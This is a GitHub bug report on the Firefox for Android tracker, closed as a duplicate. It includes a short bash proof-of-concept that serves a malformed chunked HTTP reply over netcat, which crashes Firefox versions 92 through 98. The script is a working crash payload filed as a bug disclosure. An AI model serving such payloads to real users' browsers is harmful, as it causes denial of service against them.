### ISSUE TITLE
[Bug]: Malformed content reply crashes Android Firefox 98

### ISSUE THREAD

**Issue by lulol** [mozilla-mobile/fenix#24237] opened 2022-03-12 13:10 UTC
### Steps to reproduce

A malformed content reply crashes Android Firefox 92.1.1 to 98.1.1

The following POC sample script serves a payload that when retrieved immediately crashes the app.

1.- Run
```
#!/bin/bash

PORT=8080

PAYLOAD="\
HTTP/1.1.200 OK\r
Transfer-Encoding: chunked\r
Content-Length: \r
\r
1000\r
RIFFd\xba\x00\x00WAVEfmt"

echo -ne "$PAYLOAD" | tee /dev/stderr | nc -lp $PORT -w 10
```

2.- Browse to http://&lt;server&gt;:8080
3.- The Firefox mobile app closes immediately.

### Expected behaviour

App not closing unexpectedly when receiving a malformed HTTP reply.

### Actual behaviour

The app closes unexpectedly.

### Android version

Android 6.0, 7.0, 11

### Firefox release type

Firefox

### Firefox version

98.1.1

### Additional information

#21257

**Comment by kbrosnan** [comment] 2022-03-14 15:43
Closing as a duplicate of https://github.com/mozilla-mobile/fenix/issues/21257

**Closed by kbrosnan** 2022-03-14 15:43 UTC
Labels: 🐞 bug, needs:triage
